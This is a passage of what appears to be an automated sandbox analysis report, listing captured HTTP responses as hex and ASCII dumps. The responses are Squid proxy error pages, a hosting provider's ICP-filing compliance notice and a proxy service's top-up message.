6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:50 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
